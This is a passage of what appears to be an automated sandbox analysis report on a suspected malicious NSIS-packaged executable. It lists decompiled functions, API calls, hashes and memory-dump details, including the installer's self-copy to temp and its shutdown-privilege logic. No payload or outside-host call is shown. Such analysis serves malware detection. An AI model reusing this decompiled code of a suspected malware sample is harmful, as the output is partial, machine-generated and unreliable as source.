                • RtlAllocateHeap.NTDLL(00000000,?,00000004,?,00407C67,?,00000000,?,004067DA,?,00000004,?,?,?,?,00403B03), ref: 00403E6F
                Memory Dump Source
                • Source File: 00000001.00000001.263077499.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                Similarity
                • API ID: AllocateHeap
                • String ID:
                • API String ID: 1279760036-0
                • Opcode ID: a4c9c6b9c171d7e3068f9dcb93680387a8cae48819217d3cebbdef174e207782
                • Instruction ID: 2c5ed35c3885d6f2518923907421e71a1374dda36297243b1d9f5d3b1e0eb56a
                • Opcode Fuzzy Hash: a4c9c6b9c171d7e3068f9dcb93680387a8cae48819217d3cebbdef174e207782
                • Instruction Fuzzy Hash: 54E03922505222A6D6213F6ADC04F5B7E4C9F817A2F158777AD15B62D0CB389F0181ED
                Uniqueness

                Uniqueness Score: -1.00%

                Non-executed Functions

                Function 004078CF, Relevance: 7.7, APIs: 5, Instructions: 216COMMON
                Download Yara Rule
                C-Code - Quality: 50%
                			E004078CF(void* __ecx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, signed int _a28, intOrPtr _a32, intOrPtr _a36) {
				signed int _v8;
				signed int _v12;
				void* _v24;
				signed int _t54;
				void* _t56;
				signed int _t58;
				signed int _t60;
				signed int _t64;
				signed int _t68;
				intOrPtr _t76;
				signed int _t79;
				signed int _t85;
				signed int _t88;
				void* _t93;
				void* _t94;
				intOrPtr _t96;
				signed int _t99;
				intOrPtr _t101;
				signed int _t103;
				signed int _t104;
				signed int _t105;
				void* _t108;

				_push(__ecx);
				_push(__ecx);
				_v8 =  *0x412014 ^ _t104;
				_t101 = _a20;
				if(_t101 > 0) {
					_t76 = E004080D8(_a16, _t101);
					_t108 = _t76 - _t101;
					_t4 = _t76 + 1; // 0x1
					_t101 = _t4;
					if(_t108 >= 0) {
						_t101 = _t76;
					}
				}
				_t96 = _a32;
				if(_t96 == 0) {
					_t96 =  *((intOrPtr*)( *_a4 + 8));
					_a32 = _t96;
				}
				_t54 =  *0x40c0d4(_t96, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t101, 0, 0);
				_v12 = _t54;
				if(_t54 == 0) {
					L38:
					E004018CC();
					return _t54;
				} else {
					_t93 = _t54 + _t54;
					_t83 = _t93 + 8;
					asm("sbb eax, eax");
					if((_t93 + 0x00000008 & _t54) == 0) {
						_t79 = 0;
						__eflags = 0;
						L14:
						if(_t79 == 0) {
							L36:
							_t103 = 0;
							L37:
							E004063D5(_t79);
							_t54 = _t103;
							goto L38;
						}
						_t56 =  *0x40c0d4(_t96, 1, _a16, _t101, _t79, _v12);
						_t119 = _t56;
						if(_t56 == 0) {
							goto L36;
						}
						_t98 = _v12;
						_t58 = E00405989(_t83, _t119, _a8, _a12, _t79, _v12, 0, 0, 0, 0, 0);
						_t103 = _t58;
						if(_t103 == 0) {
							goto L36;
						}
						if((_a12 & 0x00000400) == 0) {
							_t94 = _t103 + _t103;
							_t85 = _t94 + 8;
							__eflags = _t94 - _t85;
							asm("sbb eax, eax");
							__eflags = _t85 & _t58;
							if((_t85 & _t58) == 0) {
								_t99 = 0;
								__eflags = 0;
								L30:
								__eflags = _t99;
								if(__eflags == 0) {
									L35:
									E004063D5(_t99);
									goto L36;
								}
								_t60 = E00405989(_t85, __eflags, _a8, _a12, _t79, _v12, _t99, _t103, 0, 0, 0);
								__eflags = _t60;
								if(_t60 == 0) {
									goto L35;
								}
								_push(0);
								_push(0);
								__eflags = _a28;
								if(_a28 != 0) {
									_push(_a28);
									_push(_a24);
								} else {
									_push(0);
									_push(0);
								}
								_t103 =  *0x40c0d8(_a32, 0, _t99, _t103);
								__eflags = _t103;
								if(_t103 != 0) {
									E004063D5(_t99);
									goto L37;
								} else {
									goto L35;
								}
							}
							_t88 = _t94 + 8;
							__eflags = _t94 - _t88;
							asm("sbb eax, eax");
							_t64 = _t58 & _t88;
							_t85 = _t94 + 8;
							__eflags = _t64 - 0x400;
							if(_t64 > 0x400) {
								__eflags = _t94 - _t85;
								asm("sbb eax, eax");
								_t99 = E00403E3D(_t85, _t64 & _t85);
								_pop(_t85);
								__eflags = _t99;
								if(_t99 == 0) {
									goto L35;
								}
								 *_t99 = 0xdddd;
								L28:
								_t99 = _t99 + 8;
								goto L30;
							}
							__eflags = _t94 - _t85;
							asm("sbb eax, eax");
							E004018E0();
							_t99 = _t105;
							__eflags = _t99;
							if(_t99 == 0) {
								goto L35;
							}
							 *_t99 = 0xcccc;
							goto L28;
						}
						_t68 = _a28;
						if(_t68 == 0) {
							goto L37;
						}
						_t123 = _t103 - _t68;
						if(_t103 > _t68) {
							goto L36;
						}
						_t103 = E00405989(0, _t123, _a8, _a12, _t79, _t98, _a24, _t68, 0, 0, 0);
						if(_t103 != 0) {
							goto L37;
						}
						goto L36;
					}
					asm("sbb eax, eax");
					_t70 = _t54 & _t93 + 0x00000008;
					_t83 = _t93 + 8;
					if((_t54 & _t93 + 0x00000008) > 0x400) {
						__eflags = _t93 - _t83;
						asm("sbb eax, eax");
						_t79 = E00403E3D(_t83, _t70 & _t83);
						_pop(_t83);
						__eflags = _t79;
						if(__eflags == 0) {
							goto L36;
						}
						 *_t79 = 0xdddd;
						L12:
						_t79 = _t79 + 8;
						goto L14;
					}
					asm("sbb eax, eax");
					E004018E0();
					_t79 = _t105;
					if(_t79 == 0) {
						goto L36;
					}
					 *_t79 = 0xcccc;
					goto L12;
				}
			}

























                0x004078d4
                0x004078d5
                0x004078dd
                0x004078e2
                0x004078e8
                0x004078ee
                0x004078f4
                0x004078f7
                0x004078f7
                0x004078fa
                0x004078fc
                0x004078fc
                0x004078fa
                0x004078fe
                0x00407903
                0x0040790a
                0x0040790d
                0x0040790d
                0x00407929
                0x0040792f
                0x00407934
                0x00407ac7
                0x00407ad2
                0x00407ada
                0x0040793a
                0x0040793a
                0x0040793d
                0x00407942
                0x00407946
                0x0040799a
                0x0040799a
                0x0040799c
                0x0040799e
                0x00407abc
                0x00407abc
                0x00407abe
                0x00407abf
                0x00407ac5
                0x00000000
                0x00407ac5
                0x004079af
                0x004079b5
                0x004079b7
                0x00000000
                0x00000000
                0x004079bd
                0x004079cf
                0x004079d4
                0x004079d8
                0x00000000
                0x00000000
                0x004079e5
                0x00407a1f
                0x00407a22
                0x00407a25
                0x00407a27
                0x00407a29
                0x00407a2b
                0x00407a77
                0x00407a77
                0x00407a79
                0x00407a79
                0x00407a7b
                0x00407ab5
                0x00407ab6
                0x00000000
                0x00407abb
                0x00407a8f
                0x00407a94
                0x00407a96
                0x00000000
                0x00000000
                0x00407a9a
                0x00407a9b
                0x00407a9c
                0x00407a9f
                0x00407adb
                0x00407ade
                0x00407aa1
                0x00407aa1
                0x00407aa2
                0x00407aa2
                0x00407aaf
                0x00407ab1
                0x00407ab3
                0x00407ae4
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00407ab3
                0x00407a2d
                0x00407a30
                0x00407a32
                0x00407a34
                0x00407a36
                0x00407a39
                0x00407a3e
                0x00407a59
                0x00407a5b
                0x00407a65
                0x00407a67
                0x00407a68
                0x00407a6a
                0x00000000
                0x00000000
                0x00407a6c
                0x00407a72
                0x00407a72
                0x00000000
                0x00407a72
                0x00407a40
                0x00407a42
                0x00407a46
                0x00407a4b
                0x00407a4d
                0x00407a4f
                0x00000000
                0x00000000
                0x00407a51
                0x00000000
                0x00407a51
                0x004079e7
                0x004079ec
                0x00000000
                0x00000000
                0x004079f2
                0x004079f4
                0x00000000
                0x00000000
                0x00407a10
                0x00407a14
                0x00000000
                0x00000000
                0x00000000
                0x00407a1a
                0x0040794d
                0x0040794f
                0x00407951
                0x00407959
                0x00407978
                0x0040797a
                0x00407984
                0x00407986
                0x00407987
                0x00407989
                0x00000000
                0x00000000
                0x0040798f
                0x00407995
                0x00407995
                0x00000000
                0x00407995
                0x0040795d
                0x00407961
                0x00407966
                0x0040796a
                0x00000000
                0x00000000
                0x00407970
                0x00000000
                0x00407970

                APIs
                • __alloca_probe_16.LIBCMT ref: 00407961
                • __alloca_probe_16.LIBCMT ref: 00407A46
                • __freea.LIBCMT ref: 00407AB6
                  • Part of subcall function 00403E3D: RtlAllocateHeap.NTDLL(00000000,?,00000004,?,00407C67,?,00000000,?,004067DA,?,00000004,?,?,?,?,00403B03), ref: 00403E6F
                • __freea.LIBCMT ref: 00407ABF
                • __freea.LIBCMT ref: 00407AE4
                Memory Dump Source
                • Source File: 00000001.00000001.263077499.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                Similarity
                • API ID: __freea$__alloca_probe_16$AllocateHeap
                • String ID:
                • API String ID: 1423051803-0
                • Opcode ID: dda1088f7075954fbe6023d44dc497f251e567ba65003bd3d831429d24d78928
                • Instruction ID: 2b56c59f559f8582b2a4feb05c221e86bbfe0f9b068744966d06d01a738823cf
                • Opcode Fuzzy Hash: dda1088f7075954fbe6023d44dc497f251e567ba65003bd3d831429d24d78928
                • Instruction Fuzzy Hash: 8051D572B04216ABDB259F64CC41EAF77A9DB40760B15463EFC04F62C1DB38ED50CAA9
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004025BA, Relevance: 6.0, APIs: 4, Instructions: 14COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E004025BA() {
				void* _t4;
				void* _t8;

				E00402AE5();
				E00402A79();
				if(E004027D9() != 0) {
					_t4 = E0040278B(_t8, __eflags);
					__eflags = _t4;
					if(_t4 != 0) {
						return 1;
					} else {
						E00402815();
						goto L1;
					}
				} else {
					L1:
					return 0;
				}
			}





                0x004025ba
                0x004025bf
                0x004025cb
                0x004025d0
                0x004025d5
                0x004025d7
                0x004025e2
                0x004025d9
                0x004025d9
                0x00000000
                0x004025d9
                0x004025cd
                0x004025cd
                0x004025cf
                0x004025cf

                APIs
                • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 004025BA
                • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 004025BF
                • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 004025C4
                  • Part of subcall function 004027D9: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 004027EA
                • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 004025D9
                Memory Dump Source
                • Source File: 00000001.00000001.263077499.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                Similarity
                • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                • String ID:
                • API String ID: 1761009282-0
                • Opcode ID: 25f408f13cbe0c40dd9f497db491c4efe3e5092114ef2f2bbff8929357b925fc
                • Instruction ID: 4128bea016199bb2a2d03f508bec19fe8aa18f4adc422371eefe93b2158e2da6
                • Opcode Fuzzy Hash: 25f408f13cbe0c40dd9f497db491c4efe3e5092114ef2f2bbff8929357b925fc
                • Instruction Fuzzy Hash: E0C0024414014264DC6036B32F2E5AA235409A63CDBD458BBA951776C3ADFD044A553E
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00406472, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 114COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E00406472(intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _t25;
				intOrPtr* _t26;
				intOrPtr _t28;
				intOrPtr* _t29;
				intOrPtr* _t31;
				intOrPtr* _t45;
				intOrPtr* _t46;
				intOrPtr* _t47;
				intOrPtr* _t55;
				intOrPtr* _t70;
				intOrPtr _t74;

				_t74 = _a4;
				_t25 =  *((intOrPtr*)(_t74 + 0x88));
				if(_t25 != 0 && _t25 != 0x412668) {
					_t45 =  *((intOrPtr*)(_t74 + 0x7c));
					if(_t45 != 0 &&  *_t45 == 0) {
						_t46 =  *((intOrPtr*)(_t74 + 0x84));
						if(_t46 != 0 &&  *_t46 == 0) {
							E00403E03(_t46);
							E00405FEC( *((intOrPtr*)(_t74 + 0x88)));
						}
						_t47 =  *((intOrPtr*)(_t74 + 0x80));
						if(_t47 != 0 &&  *_t47 == 0) {
							E00403E03(_t47);
							E004060EA( *((intOrPtr*)(_t74 + 0x88)));
						}
						E00403E03( *((intOrPtr*)(_t74 + 0x7c)));
						E00403E03( *((intOrPtr*)(_t74 + 0x88)));
					}
				}
				_t26 =  *((intOrPtr*)(_t74 + 0x8c));
				if(_t26 != 0 &&  *_t26 == 0) {
					E00403E03( *((intOrPtr*)(_t74 + 0x90)) - 0xfe);
					E00403E03( *((intOrPtr*)(_t74 + 0x94)) - 0x80);
					E00403E03( *((intOrPtr*)(_t74 + 0x98)) - 0x80);
					E00403E03( *((intOrPtr*)(_t74 + 0x8c)));
				}
				E004065E5( *((intOrPtr*)(_t74 + 0x9c)));
				_t28 = 6;
				_t55 = _t74 + 0xa0;
				_v8 = _t28;
				_t70 = _t74 + 0x28;
				do {
					if( *((intOrPtr*)(_t70 - 8)) != 0x412658) {
						_t31 =  *_t70;
						if(_t31 != 0 &&  *_t31 == 0) {
							E00403E03(_t31);
							E00403E03( *_t55);
						}
						_t28 = _v8;
					}
					if( *((intOrPtr*)(_t70 - 0xc)) != 0) {
						_t29 =  *((intOrPtr*)(_t70 - 4));
						if(_t29 != 0 &&  *_t29 == 0) {
							E00403E03(_t29);
						}
						_t28 = _v8;
					}
					_t55 = _t55 + 4;
					_t70 = _t70 + 0x10;
					_t28 = _t28 - 1;
					_v8 = _t28;
				} while (_t28 != 0);
				return E00403E03(_t74);
			}















                0x0040647a
                0x0040647e
                0x00406486
                0x0040648f
                0x00406494
                0x0040649b
                0x004064a3
                0x004064ab
                0x004064b6
                0x004064bc
                0x004064bd
                0x004064c5
                0x004064cd
                0x004064d8
                0x004064de
                0x004064e2
                0x004064ed
                0x004064f3
                0x00406494
                0x004064f4
                0x004064fc
                0x0040650f
                0x00406522
                0x00406530
                0x0040653b
                0x00406540
                0x00406549
                0x00406551
                0x00406552
                0x00406558
                0x0040655b
                0x0040655e
                0x00406565
                0x00406567
                0x0040656b
                0x00406573
                0x0040657a
                0x00406580
                0x00406581
                0x00406581
                0x00406588
                0x0040658a
                0x0040658f
                0x00406597
                0x0040659c
                0x0040659d
                0x0040659d
                0x004065a0
                0x004065a3
                0x004065a6
                0x004065a9
                0x004065a9
                0x004065bb

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000001.00000001.263077499.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                Similarity
                • API ID: ___free_lconv_mon
                • String ID: X&A$h&A
                • API String ID: 3903695350-2460073903
                • Opcode ID: dba504eb91724cc7cfc389edac21456d4d1c599f40ca9baf248d7b7104a13552
                • Instruction ID: c022010335f5f63834756724e632691087aba38665b0d3053e0191f3bc5e7cad
                • Opcode Fuzzy Hash: dba504eb91724cc7cfc389edac21456d4d1c599f40ca9baf248d7b7104a13552
                • Instruction Fuzzy Hash: 78316E31600601AFDB209F39E845B577BE8AF00315F11457FE45AE66D1DF39EEA08B98
                Uniqueness

                Uniqueness Score: -1.00%

                Analysis Process: RHK098760045678009000.exe PID: 5820 Parent PID: 1104 RHK098760045678009000.exeCOMMON

                Executed Functions

                Function 004030FB, Relevance: 80.8, APIs: 26, Strings: 20, Instructions: 315stringfilecomCOMMON
                Download Yara Rule
                C-Code - Quality: 78%
                			_entry_() {
				intOrPtr _t47;
				CHAR* _t51;
				char* _t54;
				CHAR* _t56;
				void* _t60;
				intOrPtr _t62;
				int _t64;
				char* _t67;
				char* _t68;
				int _t69;
				char* _t71;
				char* _t74;
				intOrPtr _t87;
				int _t91;
				intOrPtr _t93;
				void* _t95;
				void* _t107;
				intOrPtr* _t108;
				char _t111;
				CHAR* _t116;
				char* _t117;
				CHAR* _t118;
				char* _t119;
				void* _t121;
				char* _t123;
				char* _t125;
				char* _t126;
				void* _t128;
				void* _t129;
				intOrPtr _t138;
				char _t147;

				 *(_t129 + 0x20) = 0;
				 *((intOrPtr*)(_t129 + 0x14)) = "Error writing temporary file. Make sure your temp folder is valid.";
				 *(_t129 + 0x1c) = 0;
				 *(_t129 + 0x18) = 0x20;
				SetErrorMode(0x8001); // executed
				if(GetVersion() != 6) {
					_t108 = E00405F28(0);
					if(_t108 != 0) {
						 *_t108(0xc00);
					}
				}
				_t118 = "UXTHEME";
				goto L4;
				while(1) {
					L22:
					_t111 =  *_t56;
					_t134 = _t111;
					if(_t111 == 0) {
						break;
					}
					__eflags = _t111 - 0x20;
					if(_t111 != 0x20) {
						L10:
						__eflags =  *_t56 - 0x22;
						 *((char*)(_t129 + 0x14)) = 0x20;
						if( *_t56 == 0x22) {
							_t56 =  &(_t56[1]);
							__eflags = _t56;
							 *((char*)(_t129 + 0x14)) = 0x22;
						}
						__eflags =  *_t56 - 0x2f;
						if( *_t56 != 0x2f) {
							L20:
							_t56 = E004056B6(_t56,  *((intOrPtr*)(_t129 + 0x14)));
							__eflags =  *_t56 - 0x22;
							if(__eflags == 0) {
								_t56 =  &(_t56[1]);
								__eflags = _t56;
							}
							continue;
						} else {
							_t56 =  &(_t56[1]);
							__eflags =  *_t56 - 0x53;
							if( *_t56 == 0x53) {
								__eflags = (_t56[1] | 0x00000020) - 0x20;
								if((_t56[1] | 0x00000020) == 0x20) {
									_t14 = _t129 + 0x18;
									 *_t14 =  *(_t129 + 0x18) | 0x00000002;
									__eflags =  *_t14;
								}
							}
							__eflags =  *_t56 - 0x4352434e;
							if( *_t56 == 0x4352434e) {
								__eflags = (_t56[4] | 0x00000020) - 0x20;
								if((_t56[4] | 0x00000020) == 0x20) {
									_t17 = _t129 + 0x18;
									 *_t17 =  *(_t129 + 0x18) | 0x00000004;
									__eflags =  *_t17;
								}
							}
							__eflags =  *((intOrPtr*)(_t56 - 2)) - 0x3d442f20;
							if( *((intOrPtr*)(_t56 - 2)) == 0x3d442f20) {
								 *((intOrPtr*)(_t56 - 2)) = 0;
								_t57 =  &(_t56[2]);
								__eflags =  &(_t56[2]);
								E00405B98("C:\\Users\\FRONTD~1\\AppData\\Local\\Temp", _t57);
								L25:
								_t116 = "C:\\Users\\FRONTD~1\\AppData\\Local\\Temp\\";
								GetTempPathA(0x400, _t116);
								_t60 = E004030CA(_t134);
								_t135 = _t60;
								if(_t60 != 0) {
									L27:
									DeleteFileA("1033"); // executed
									_t62 = E00402C55(_t136,  *(_t129 + 0x18)); // executed
									 *((intOrPtr*)(_t129 + 0x10)) = _t62;
									if(_t62 != 0) {
										L37:
										E00403511();
										__imp__OleUninitialize();
										_t143 =  *((intOrPtr*)(_t129 + 0x10));
										if( *((intOrPtr*)(_t129 + 0x10)) == 0) {
											__eflags =  *0x423fd4; // 0x0
											if(__eflags == 0) {
												L64:
												_t64 =  *0x423fec; // 0xffffffff
												__eflags = _t64 - 0xffffffff;
												if(_t64 != 0xffffffff) {
													 *(_t129 + 0x1c) = _t64;
												}
												ExitProcess( *(_t129 + 0x1c));
											}
											_t126 = E00405F28(5);
											_t119 = E00405F28(6);
											_t67 = E00405F28(7);
											__eflags = _t126;
											_t117 = _t67;
											if(_t126 != 0) {
												__eflags = _t119;
												if(_t119 != 0) {
													__eflags = _t117;
													if(_t117 != 0) {
														_t74 =  *_t126(GetCurrentProcess(), 0x28, _t129 + 0x20);
														__eflags = _t74;
														if(_t74 != 0) {
															 *_t119(0, "SeShutdownPrivilege", _t129 + 0x28);
															 *(_t129 + 0x3c) = 1;
															 *(_t129 + 0x48) = 2;
															 *_t117( *((intOrPtr*)(_t129 + 0x34)), 0, _t129 + 0x2c, 0, 0, 0);
														}
													}
												}
											}
											_t68 = E00405F28(8);
											__eflags = _t68;
											if(_t68 == 0) {
												L62:
												_t69 = ExitWindowsEx(2, 0x80040002);
												__eflags = _t69;
												if(_t69 != 0) {
													goto L64;
												}
												goto L63;
											} else {
												_t71 =  *_t68(0, 0, 0, 0x25, 0x80040002);
												__eflags = _t71;
												if(_t71 == 0) {
													L63:
													E0040140B(9);
													goto L64;
												}
												goto L62;
											}
										}
										E00405459( *((intOrPtr*)(_t129 + 0x14)), 0x200010);
										ExitProcess(2);
									}
									_t138 =  *0x423f5c; // 0x0
									if(_t138 == 0) {
										L36:
										 *0x423fec =  *0x423fec | 0xffffffff;
										 *(_t129 + 0x1c) = E004035EB( *0x423fec);
										goto L37;
									}
									_t123 = E004056B6(_t125, 0);
									while(_t123 >= _t125) {
										__eflags =  *_t123 - 0x3d3f5f20;
										if(__eflags == 0) {
											break;
										}
										_t123 = _t123 - 1;
										__eflags = _t123;
									}
									_t140 = _t123 - _t125;
									 *((intOrPtr*)(_t129 + 0x10)) = "Error launching installer";
									if(_t123 < _t125) {
										_t121 = E004053E0(_t143);
										lstrcatA(_t116, "~nsu");
										if(_t121 != 0) {
											lstrcatA(_t116, "A");
										}
										lstrcatA(_t116, ".tmp");
										_t127 = "C:\\Users\\frontdesk\\Desktop";
										if(lstrcmpiA(_t116, "C:\\Users\\frontdesk\\Desktop") != 0) {
											_push(_t116);
											if(_t121 == 0) {
												E004053C3();
											} else {
												E00405346();
											}
											SetCurrentDirectoryA(_t116);
											_t147 = "C:\\Users\\FRONTD~1\\AppData\\Local\\Temp"; // 0x43
											if(_t147 == 0) {
												E00405B98("C:\\Users\\FRONTD~1\\AppData\\Local\\Temp", _t127);
											}
											E00405B98(0x425000,  *(_t129 + 0x20));
											 *0x425400 = 0x41;
											_t128 = 0x1a;
											do {
												_t87 =  *0x423f50; // 0x58d7c8
												E00405BBA(0, _t116, 0x41f0f0, 0x41f0f0,  *((intOrPtr*)(_t87 + 0x120)));
												DeleteFileA(0x41f0f0);
												if( *((intOrPtr*)(_t129 + 0x10)) != 0) {
													_t91 = CopyFileA("C:\\Users\\frontdesk\\Desktop\\RHK098760045678009000.exe", 0x41f0f0, 1);
													_t149 = _t91;
													if(_t91 != 0) {
														_push(0);
														_push(0x41f0f0);
														E004058E6(_t149);
														_t93 =  *0x423f50; // 0x58d7c8
														E00405BBA(0, _t116, 0x41f0f0, 0x41f0f0,  *((intOrPtr*)(_t93 + 0x124)));
														_t95 = E004053F8(0x41f0f0);
														if(_t95 != 0) {
															CloseHandle(_t95);
															 *((intOrPtr*)(_t129 + 0x10)) = 0;
														}
													}
												}
												 *0x425400 =  *0x425400 + 1;
												_t128 = _t128 - 1;
												_t151 = _t128;
											} while (_t128 != 0);
											_push(0);
											_push(_t116);
											E004058E6(_t151);
										}
										goto L37;
									}
									 *_t123 = 0;
									_t124 =  &(_t123[4]);
									if(E0040576C(_t140,  &(_t123[4])) == 0) {
										goto L37;
									}
									E00405B98("C:\\Users\\FRONTD~1\\AppData\\Local\\Temp", _t124);
									E00405B98("C:\\Users\\FRONTD~1\\AppData\\Local\\Temp", _t124);
									 *((intOrPtr*)(_t129 + 0x10)) = 0;
									goto L36;
								}
								GetWindowsDirectoryA(_t116, 0x3fb);
								lstrcatA(_t116, "\\Temp");
								_t107 = E004030CA(_t135);
								_t136 = _t107;
								if(_t107 == 0) {
									goto L37;
								}
								goto L27;
							} else {
								goto L20;
							}
						}
					} else {
						goto L9;
					}
					do {
						L9:
						_t56 =  &(_t56[1]);
						__eflags =  *_t56 - 0x20;
					} while ( *_t56 == 0x20);
					goto L10;
				}
				goto L25;
				L4:
				E00405EBA(_t118); // executed
				_t118 =  &(_t118[lstrlenA(_t118) + 1]);
				if( *_t118 != 0) {
					goto L4;
				} else {
					E00405F28(0xd);
					_t47 = E00405F28(0xb);
					 *0x423f44 = _t47;
					__imp__#17();
					__imp__OleInitialize(0); // executed
					 *0x423ff8 = _t47;
					SHGetFileInfoA(0x41f4f0, 0, _t129 + 0x38, 0x160, 0); // executed
					E00405B98("aufce Setup", "NSIS Error");
					_t51 = GetCommandLineA();
					_t125 = "C:\\Users\\frontdesk\\Desktop\\RHK098760045678009000.exe 0";
					E00405B98(_t125, _t51);
					 *0x423f40 = GetModuleHandleA(0);
					_t54 = _t125;
					if("C:\\Users\\frontdesk\\Desktop\\RHK098760045678009000.exe 0" == 0x22) {
						 *((char*)(_t129 + 0x14)) = 0x22;
						_t54 =  &M0042A001;
					}
					_t56 = CharNextA(E004056B6(_t54,  *((intOrPtr*)(_t129 + 0x14))));
					 *(_t129 + 0x20) = _t56;
					goto L22;
				}
			}


































                0x0040310c
                0x00403110
                0x00403118
                0x0040311c
                0x00403121
                0x00403131
                0x00403134
                0x0040313b
                0x00403142
                0x00403142
                0x0040313b
                0x00403144
                0x00403144
                0x0040325a
                0x0040325a
                0x0040325a
                0x0040325c
                0x0040325e
                0x00000000
                0x00000000
                0x004031f3
                0x004031f6
                0x004031fe
                0x004031fe
                0x00403201
                0x00403206
                0x00403208
                0x00403208
                0x00403209
                0x00403209
                0x0040320e
                0x00403211
                0x0040324a
                0x0040324f
                0x00403254
                0x00403257
                0x00403259
                0x00403259
                0x00403259
                0x00000000
                0x00403213
                0x00403213
                0x00403214
                0x00403217
                0x0040321f
                0x00403222
                0x00403224
                0x00403224
                0x00403224
                0x00403224
                0x00403222
                0x00403229
                0x0040322f
                0x00403237
                0x0040323a
                0x0040323c
                0x0040323c
                0x0040323c
                0x0040323c
                0x0040323a
                0x00403241
                0x00403248
                0x00403262
                0x00403265
                0x00403265
                0x0040326e
                0x00403273
                0x00403273
                0x0040327e
                0x00403284
                0x00403289
                0x0040328b
                0x004032b1
                0x004032b6
                0x004032c0
                0x004032c7
                0x004032cb
                0x00403332
                0x00403332
                0x00403337
                0x0040333d
                0x00403341
                0x00403456
                0x0040345c
                0x004034f9
                0x004034f9
                0x004034fe
                0x00403501
                0x00403503
                0x00403503
                0x0040350b
                0x0040350b
                0x0040346b
                0x00403474
                0x00403476
                0x0040347b
                0x0040347d
                0x0040347f
                0x00403481
                0x00403483
                0x00403485
                0x00403487
                0x00403497
                0x00403499
                0x0040349b
                0x004034a8
                0x004034b7
                0x004034bf
                0x004034c7
                0x004034c7
                0x0040349b
                0x00403487
                0x00403483
                0x004034cb
                0x004034d0
                0x004034d7
                0x004034e5
                0x004034e8
                0x004034ee
                0x004034f0
                0x00000000
                0x00000000
                0x00000000
                0x004034d9
                0x004034df
                0x004034e1
                0x004034e3
                0x004034f2
                0x004034f4
                0x00000000
                0x004034f4
                0x00000000
                0x004034e3
                0x004034d7
                0x00403350
                0x00403357
                0x00403357
                0x004032cd
                0x004032d3
                0x00403322
                0x00403322
                0x0040332e
                0x00000000
                0x0040332e
                0x004032dc
                0x004032e9
                0x004032e0
                0x004032e6
                0x00000000
                0x00000000
                0x004032e8
                0x004032e8
                0x004032e8
                0x004032ed
                0x004032ef
                0x004032f7
                0x00403368
                0x0040336a
                0x00403371
                0x00403379
                0x00403379
                0x00403384
                0x00403389
                0x00403398
                0x0040339c
                0x0040339d
                0x004033a6
                0x0040339f
                0x0040339f
                0x0040339f
                0x004033ac
                0x004033b2
                0x004033b8
                0x004033c0
                0x004033c0
                0x004033ce
                0x004033d5
                0x004033de
                0x004033e4
                0x004033e4
                0x004033f0
                0x004033f6
                0x00403400
                0x0040340a
                0x00403410
                0x00403412
                0x00403414
                0x00403415
                0x00403416
                0x0040341b
                0x00403427
                0x0040342d
                0x00403434
                0x00403437
                0x0040343d
                0x0040343d
                0x00403434
                0x00403412
                0x00403441
                0x00403447
                0x00403447
                0x00403447
                0x0040344a
                0x0040344b
                0x0040344c
                0x0040344c
                0x00000000
                0x00403398
                0x004032f9
                0x004032fb
                0x00403306
                0x00000000
                0x00000000
                0x0040330e
                0x00403319
                0x0040331e
                0x00000000
                0x0040331e
                0x00403293
                0x0040329f
                0x004032a4
                0x004032a9
                0x004032ab
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00403248
                0x00000000
                0x00000000
                0x00000000
                0x004031f8
                0x004031f8
                0x004031f8
                0x004031f9
                0x004031f9
                0x00000000
                0x004031f8
                0x00000000
                0x00403149
                0x0040314a
                0x00403156
                0x0040315c
                0x00000000
                0x0040315e
                0x00403160
                0x00403167
                0x0040316c
                0x00403171
                0x00403178
                0x0040317e
                0x00403194
                0x004031a4
                0x004031a9
                0x004031af
                0x004031b6
                0x004031c9
                0x004031ce
                0x004031d0
                0x004031d2
                0x004031d7
                0x004031d7
                0x004031e7
                0x004031ed
                0x00000000
                0x004031ed

                APIs
                • SetErrorMode.KERNELBASE ref: 00403121
                • GetVersion.KERNEL32 ref: 00403127
                • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403150
                • #17.COMCTL32(0000000B,0000000D), ref: 00403171
                • OleInitialize.OLE32(00000000), ref: 00403178
                • SHGetFileInfoA.SHELL32(0041F4F0,00000000,?,00000160,00000000), ref: 00403194
                • GetCommandLineA.KERNEL32(aufce Setup,NSIS Error), ref: 004031A9
                • GetModuleHandleA.KERNEL32(00000000,C:\Users\user\Desktop\RHK098760045678009000.exe 0,00000000), ref: 004031BC
                • CharNextA.USER32(00000000,C:\Users\user\Desktop\RHK098760045678009000.exe 0,00409168), ref: 004031E7
                • GetTempPathA.KERNEL32(00000400,C:\Users\user~1\AppData\Local\Temp\,00000000,00000020), ref: 0040327E
                • GetWindowsDirectoryA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,000003FB), ref: 00403293
                • lstrcatA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,\Temp), ref: 0040329F
                • DeleteFileA.KERNELBASE(1033), ref: 004032B6
                  • Part of subcall function 00405F28: GetModuleHandleA.KERNEL32(?,?,?,00403165,0000000D), ref: 00405F3A
                  • Part of subcall function 00405F28: GetProcAddress.KERNEL32(00000000,?), ref: 00405F55
                • OleUninitialize.OLE32(00000020), ref: 00403337
                • ExitProcess.KERNEL32 ref: 00403357
